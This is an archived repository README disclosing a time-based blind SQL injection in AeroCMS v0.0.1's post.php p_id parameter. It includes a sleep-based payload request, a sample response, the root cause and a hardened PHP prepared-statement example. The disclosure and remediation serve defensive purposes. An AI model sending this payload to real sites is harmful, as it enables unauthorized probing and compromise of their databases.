This repository has been archived by the owner on May 8, 2023. It is now read-only.
I was drawn to this source code after reading a quick write-up by [nu11secur1ty] earlier today about the "author parameter from the AeroCMS-v0.0.1" being vuln to SQLi.

It seems there is more... PoC:

1] `GET /post.php?p_id=`

Response normal [7ms]

```http
HTTP/1.1 200 OK
Date: Tue, 30 Aug 2022 16:00:08 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6100
Connection: close
Content-Type: text/html; charset=UTF-8
```
2] **`GET /post.php?p_id=(select*from(select(sleep(20)))a)`**

Delayed response. A clear indication of SQLi vuln.

3] Checking through the source code we can see the problem. See post.php lines 94-106.

Root cause? Unsanitized input into mysqli_query.

There are more vulnerabilities within this source; I'm happy to disclose, just contact me. Please ensure proper sanitization of all input.
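Added example (not AeroCMS's own post.php and not the reporter's code): the unsanitized pattern the report describes, beside a hardened handler that validates `p_id` as an integer and binds it through a prepared statement. The `posts` table, `post_id` column and `$connection` variable are assumed names, not taken from the project.

```php
<?php
// Added example, not AeroCMS's post.php. Assumes a hypothetical `posts`
// table with an integer primary key `post_id` and an open mysqli
// connection in $connection; adjust the names to the real schema.

// Unsafe pattern (the shape of the reported bug): the raw GET value is
// interpolated into the SQL text, so whatever the client sends in p_id is
// parsed by MySQL as part of the statement.
function fetch_post_unsafe(mysqli $connection, array $get): ?array
{
    $p_id = $get['p_id'] ?? '';
    $result = mysqli_query($connection, "SELECT * FROM posts WHERE post_id = $p_id");
    return $result ? mysqli_fetch_assoc($result) : null;
}

// Hardened version: validate the type first, then bind the value as a
// parameter so it can never change the structure of the query.
function fetch_post_safe(mysqli $connection, array $get): ?array
{
    // p_id must be a positive integer; anything else is rejected up front
    // (FILTER_VALIDATE_INT returns false for missing or non-numeric input).
    $p_id = filter_var($get['p_id'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($p_id === false) {
        http_response_code(400);
        return null;
    }

    // The placeholder is the only thing the client value can ever fill.
    $stmt = mysqli_prepare($connection, 'SELECT * FROM posts WHERE post_id = ?');
    if ($stmt === false) {
        return null;
    }
    mysqli_stmt_bind_param($stmt, 'i', $p_id);
    mysqli_stmt_execute($stmt);

    // mysqli_stmt_get_result() needs the mysqlnd driver (default on modern PHP).
    $result = mysqli_stmt_get_result($stmt);
    $row = $result ? mysqli_fetch_assoc($result) : null;
    mysqli_stmt_close($stmt);
    return $row ?: null;
}
```

The same two-step pattern (validate the expected type, then bind) applies to every other user-controlled value that reaches mysqli_query in the code base.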